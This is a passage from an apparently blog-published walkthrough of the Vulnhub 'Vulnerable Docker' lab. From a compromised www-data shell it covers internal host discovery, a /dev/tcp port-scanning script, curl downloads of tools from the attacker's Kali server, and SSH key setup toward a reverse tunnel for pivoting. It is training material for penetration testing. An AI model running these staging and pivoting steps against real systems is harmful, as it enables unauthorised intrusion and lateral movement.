www-data@8f4bca8ef241:/var/www/html$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
5: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.2/16 scope global eth0
valid_lft forever preferred_lft forever
This is the container's internal IP address.
Ping to see what other hosts are on 172.18.0.0/16:
www-data@8f4bca8ef241:/$ ping -c 1 172.18.0.3
ping -c 1 172.18.0.3
PING 172.18.0.3 (172.18.0.3): 56 data bytes
64 bytes from 172.18.0.3: icmp_seq=0 ttl=64 time=0.050 ms
--- 172.18.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.050/0.050/0.050/0.000 ms
www-data@8f4bca8ef241:/$ ping -c 1 172.18.0.4
ping -c 1 172.18.0.4
PING 172.18.0.4 (172.18.0.4): 56 data bytes
64 bytes from 172.18.0.4: icmp_seq=0 ttl=64 time=0.062 ms
--- 172.18.0.4 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.062/0.062/0.062/0.000 ms
www-data@8f4bca8ef241:/$ ping -c 1 172.18.0.1
ping -c 1 172.18.0.1
PING 172.18.0.1 (172.18.0.1): 56 data bytes
64 bytes from 172.18.0.1: icmp_seq=0 ttl=64 time=0.043 ms
--- 172.18.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.043/0.043/0.043/0.000 ms
Write a shell script to run inside the container and probe which ports are open on 172.18.0.1/2/3/4:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cat shell.sh
#!/bin/bash
hosts=(
    "172.18.0.1"
    "172.18.0.2"
    "172.18.0.3"
    "172.18.0.4"
)
END=65535
for host in "${hosts[@]}"
do
    echo "========================================"
    echo "Scanning $host"
    echo "========================================"
    for ((port=1; port<END;port++))
    do
        echo "" > /dev/tcp/$host/$port && echo "port $port is open"
    done 2>/dev/null
done
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$
The shell.sh file can be prepared locally on Kali Linux and then uploaded to the target host (the container) via Python's built-in HTTP server module.
Run the shell.sh script:
www-data@8f4bca8ef241:/tmp$ curl -O http://192.168.56.137:8000/shell.sh
curl -O http://192.168.56.137:8000/shell.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 447 100 447 0 0 80265 0 --:--:-- --:--:-- --:--:-- 89400
www-data@8f4bca8ef241:/tmp$ ls
ls
shell.sh
www-data@8f4bca8ef241:/tmp$ chmod +x shell.sh
chmod +x shell.sh
www-data@8f4bca8ef241:/tmp$ ./shell.sh
./shell.sh
========================================
Scanning 172.18.0.1
========================================
port 22 is open
port 8000 is open
========================================
Scanning 172.18.0.2
========================================
port 80 is open
port 44977 is open
========================================
Scanning 172.18.0.3
========================================
port 3306 is open
========================================
Scanning 172.18.0.4
========================================
port 22 is open
port 8022 is open
www-data@8f4bca8ef241:/tmp$
Port 8022 is open on 172.18.0.4:
www-data@8f4bca8ef241:/tmp$ curl -s 172.18.0.4:8022
curl -s 172.18.0.4:8022
<!DOCTYPE html>
<html style="height:100%; !important;">
<head>
<title>Docker-SSH</title>
<script src="/js/jquery-1.11.3.min.js"></script>
<script src="/js/term.js"></script>
<link rel="stylesheet" href="/css/term.css" type="text/css" />
</head>
<body>
<script type="text/javascript">
computeMaxTerminalSize = function(){
rows = Math.round($(window).height() / 14);
cols = Math.round($(window).width() / 6.8);
return {cols: cols, rows: rows};
};
var connectionId, doneResizing, evt, term;
connectionId = null;
termSize = computeMaxTerminalSize()
term = new Terminal({
cols: termSize.cols,
rows: termSize.rows,
useStyle: true,
screenKeys: true,
cursorBlink: true
});
evt = new EventSource("/api/v1/terminal/stream/");
evt.addEventListener('connectionId', function(event) {
connectionId = event.data;
term.write("Connection established\r\n");
doneResizing();
});
evt.addEventListener('data', function(event) {
console.log('data', event);
term.write(JSON.parse(event.data));
});
evt.addEventListener('exit', function() {
evt.close();
term.write("\r\nTerminal exited.");
});
evt.addEventListener('error', function() {
evt.close();
term.write("\r\nTerminal exited.");
});
term.on('data', function(data) {
if (evt.readyState === EventSource.OPEN) {
$.post("/api/v1/terminal/send/" + connectionId, {data: data});
}
});
term.on('title', function(title) {
document.title = title;
});
term.open(document.body);
window.onresize = function(event) {
clearTimeout(this.id);
this.id = setTimeout(doneResizing, 500);
};
doneResizing = function() {
maxTermSize = computeMaxTerminalSize();
$.post(
"/api/v1/terminal/resize-window/" + connectionId,
maxTermSize,
function(data){
if(data && data.cols && data.rows){
term.resize(data.cols, data.rows);
}
}
);
};
</script>
</body>
</html>
The page title shows that 172.18.0.4 is running Docker-SSH.
Next, a tunnel needs to be set up (via port forwarding).
At this point, port forwarding is needed to open a tunnel for communication: download the openssh .deb package, use the ssh and ssh-keygen commands it contains to generate a key pair and open a tunnel to Kali, then access the service through a web browser. Download address: http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
Because the target machine is configured in host-only mode, it cannot download directly from the internet; download to Kali Linux first, then upload to the target:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ wget http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
--2022-11-04 23:51:12-- http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
Resolving http.us.debian.org (http.us.debian.org)... 208.80.154.139, 2600:3404:200:237::2, 2600:3402:200:227::2, ...
Connecting to http.us.debian.org (http.us.debian.org)|208.80.154.139|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 692514 (676K) [application/vnd.debian.binary-package]
Saving to: ‘openssh-client_6.7p1-5+deb8u4_amd64.deb’
openssh-client_6.7p 100%[================>] 676.28K 513KB/s in 1.3s
2022-11-04 23:51:14 (513 KB/s) - ‘openssh-client_6.7p1-5+deb8u4_amd64.deb’ saved [692514/692514]
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan openssh-client_6.7p1-5+deb8u4_amd64.deb shell.php shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ mv openssh-client_6.7p1-5+deb8u4_amd64.deb openssh.deb
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.150 - - [04/Nov/2022 23:51:48] "GET /openssh.deb HTTP/1.1" 200 -
www-data@8f4bca8ef241:/tmp$ curl -O http://192.168.56.137:8000/openssh.deb
curl -O http://192.168.56.137:8000/openssh.deb
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 676k 100 676k 0 0 85.1M 0 --:--:-- --:--:-- --:--:-- 94.3M
www-data@8f4bca8ef241:/tmp$ ls
ls
openssh.deb
shell.sh
www-data@8f4bca8ef241:/tmp$
But installing it fails:
www-data@8f4bca8ef241:/tmp$ dpkg -i openssh.deb
dpkg -i openssh.deb
dpkg: error: requested operation requires superuser privilege
www-data@8f4bca8ef241:/tmp$
So we need to extract openssh.deb locally on Kali with the dpkg -x option, pack the result into a .tar.gz, and upload that to the target:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ dpkg -x openssh.deb openssh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan openssh openssh.deb shell.php shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cd openssh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker/openssh]
└─$ ls
etc usr
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker/openssh]
└─$ cd ..
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan openssh openssh.deb shell.php shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ tar -czvf openssh_deb.tar.gz openssh
openssh/usr/share/doc/openssh-client/changelog.Debian.gz
openssh/usr/share/doc/openssh-client/faq.html
openssh/etc/
openssh/etc/ssh/
openssh/etc/ssh/ssh_config
openssh/etc/ssh/moduli
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan openssh.deb shell.php
openssh openssh_deb.tar.gz shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$
www-data@8f4bca8ef241:/tmp$ curl -O http://192.168.56.137:8000/openssh_deb.tar.gz
curl -O http://192.168.56.137:8000/openssh_deb.tar.gz
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 1608k 100 1608k 0 0 136M 0 --:--:-- --:--:-- --:--:-- 142M
www-data@8f4bca8ef241:/tmp$ ls
ls
openssh.deb
openssh_deb.tar.gz
shell.sh
www-data@8f4bca8ef241:/tmp$ rm -rf openssh.deb
rm -rf openssh.deb
www-data@8f4bca8ef241:/tmp$ tar -zxvf openssh_deb.tar.gz
tar -zxvf openssh_deb.tar.gz
openssh/
openssh/usr/
openssh/usr/lib/
openssh/usr/lib/openssh/
openssh/usr/lib/openssh/ssh-keysign
openssh/usr/lib/openssh/ssh-pkcs11-helper
openssh/usr/bin/
openssh/usr/bin/sftp
openssh/usr/bin/ssh-keygen
openssh/usr/bin/ssh-agent
openssh/usr/bin/slogin
openssh/usr/bin/scp
openssh/usr/bin/ssh-keyscan
openssh/usr/bin/ssh-copy-id
openssh/usr/bin/ssh
openssh/usr/bin/ssh-add
openssh/usr/bin/ssh-argv0
openssh/usr/share/
openssh/usr/share/upstart/
openssh/usr/share/upstart/sessions/
openssh/usr/share/upstart/sessions/ssh-agent.conf
openssh/usr/share/lintian/
openssh/usr/share/lintian/overrides/
openssh/usr/share/lintian/overrides/openssh-client
openssh/usr/share/man/
openssh/usr/share/man/man1/
openssh/usr/share/man/man1/ssh-keyscan.1.gz
openssh/usr/share/man/man1/ssh-keygen.1.gz
openssh/usr/share/man/man1/scp.1.gz
openssh/usr/share/man/man1/ssh-copy-id.1.gz
openssh/usr/share/man/man1/ssh-agent.1.gz
openssh/usr/share/man/man1/sftp.1.gz
openssh/usr/share/man/man1/ssh.1.gz
openssh/usr/share/man/man1/ssh-add.1.gz
openssh/usr/share/man/man1/slogin.1.gz
openssh/usr/share/man/man1/ssh-argv0.1.gz
openssh/usr/share/man/man8/
openssh/usr/share/man/man8/ssh-keysign.8.gz
openssh/usr/share/man/man8/ssh-pkcs11-helper.8.gz
openssh/usr/share/man/man5/
openssh/usr/share/man/man5/ssh_config.5.gz
openssh/usr/share/man/man5/moduli.5.gz
openssh/usr/share/apport/
openssh/usr/share/apport/package-hooks/
openssh/usr/share/apport/package-hooks/openssh-client.py
openssh/usr/share/doc/
openssh/usr/share/doc/openssh-client/
openssh/usr/share/doc/openssh-client/ChangeLog.gssapi
openssh/usr/share/doc/openssh-client/copyright
openssh/usr/share/doc/openssh-client/NEWS.Debian.gz
openssh/usr/share/doc/openssh-client/README.tun.gz
openssh/usr/share/doc/openssh-client/README.dns
openssh/usr/share/doc/openssh-client/README.Debian.gz
openssh/usr/share/doc/openssh-client/OVERVIEW.gz
openssh/usr/share/doc/openssh-client/README
openssh/usr/share/doc/openssh-client/changelog.gz
openssh/usr/share/doc/openssh-client/changelog.Debian.gz
openssh/usr/share/doc/openssh-client/faq.html
openssh/etc/
openssh/etc/ssh/
openssh/etc/ssh/ssh_config
openssh/etc/ssh/moduli
www-data@8f4bca8ef241:/tmp$ ls
ls
openssh
openssh_deb.tar.gz
shell.sh
www-data@8f4bca8ef241:/tmp$ cd openssh
cd openssh
www-data@8f4bca8ef241:/tmp/openssh$ ls
ls
etc
usr
www-data@8f4bca8ef241:/tmp/openssh$ cd usr
cd usr
www-data@8f4bca8ef241:/tmp/openssh/usr$ ls
ls
bin
lib
share
www-data@8f4bca8ef241:/tmp/openssh/usr$ cd ..
cd ..
www-data@8f4bca8ef241:/tmp/openssh$
This successfully gets the contents of openssh.deb onto the target machine (i.e. the container).
www-data@8f4bca8ef241:/tmp/openssh$ ls
ls
etc
usr
www-data@8f4bca8ef241:/tmp/openssh$ cd usr
cd usr
www-data@8f4bca8ef241:/tmp/openssh/usr$ cd bin
cd bin
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ ls
ls
scp
sftp
slogin
ssh
ssh-add
ssh-agent
ssh-argv0
ssh-copy-id
ssh-keygen
ssh-keyscan
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ chmod +x ssh*
chmod +x ssh*
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ ./ssh-keygen -P '' -f id_rsa -t rsa
./ssh-keygen -P '' -f id_rsa -t rsa
Generating public/private rsa key pair.
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
90:19:15:25:7c:c5:f4:d5:bd:dc:2e:5a:23:62:a8:98 www-data@8f4bca8ef241
The key's randomart image is:
+---[RSA 2048]----+
| .o+o.+o +|
| +... .. .o|
| + . o o|
| . o.|
| S. . |
| . o . + .|
| o . . . + o |
| E . . |
| |
+-----------------+
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ ls
ls
id_rsa
id_rsa.pub
scp
sftp
slogin
ssh
ssh-add
ssh-agent
ssh-argv0
ssh-copy-id
ssh-keygen
ssh-keyscan
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$
View the public key file generated above and copy its contents to Kali Linux:
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ cat id_rsa.pub
cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpi9WMsShsaGdY7Wk5WaCtzJft8jBxFGeKu031h0QN7obPECtMkfaWBUjtlMLNegwu8TjBvIShZpdlARI8C25MW6fNTGQQKP6kvrPVC1mcsDvBtkQMyZXAMAQpRxD6SgHiE6Rr+bIffRgcFbTN8UqjqX0sxDrJCJeN1i7MJVPa53rkF465Fk+oNeCcVFSekPPYW7XpisOgkeMQ7RG4KHjy633IfHMF3/wT+gToAk+I5Tcs9wlHqTHdU503N5w8ILCRdfxF7YOyGllWeJVYPpHZS9k+1peQ9GjCsaBeCfKZkv9SCrjTPy0AzrdZ1AJInCGXJdoj508LcjbOsdyG3VA3 www-data@8f4bca8ef241
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$
Append the public key to authorized_keys on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls -alh ~/.ssh
total 24K
drwx------ 2 kali kali 4.0K Nov 3 09:09 .
drwxr-xr-x 24 kali kali 4.0K Nov 5 00:03 ..
-rw------- 1 kali kali 2.6K Oct 31 09:07 id_rsa
-rw-r--r-- 1 kali kali 563 Oct 31 09:07 id_rsa.pub
-rw------- 1 kali kali 1.8K Nov 3 07:59 known_hosts
-rw------- 1 kali kali 1.6K Nov 3 07:58 known_hosts.old
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cat id_rsa.pub > ~/.ssh/authorized_keys
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cat ~/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpi9WMsShsaGdY7Wk5WaCtzJft8jBxFGeKu031h0QN7obPECtMkfaWBUjtlMLNegwu8TjBvIShZpdlARI8C25MW6fNTGQQKP6kvrPVC1mcsDvBtkQMyZXAMAQpRxD6SgHiE6Rr+bIffRgcFbTN8UqjqX0sxDrJCJeN1i7MJVPa53rkF465Fk+oNeCcVFSekPPYW7XpisOgkeMQ7RG4KHjy633IfHMF3/wT+gToAk+I5Tcs9wlHqTHdU503N5w8ILCRdfxF7YOyGllWeJVYPpHZS9k+1peQ9GjCsaBeCfKZkv9SCrjTPy0AzrdZ1AJInCGXJdoj508LcjbOsdyG3VA3 www-data@8f4bca8ef241
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls -alh ~/.ssh/authorized_keys
-rw-r--r-- 1 kali kali 403 Nov 5 00:08 /home/kali/.ssh/authorized_keys
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$
From: https://www.cnblogs.com/jason-huawen/p/16859959.html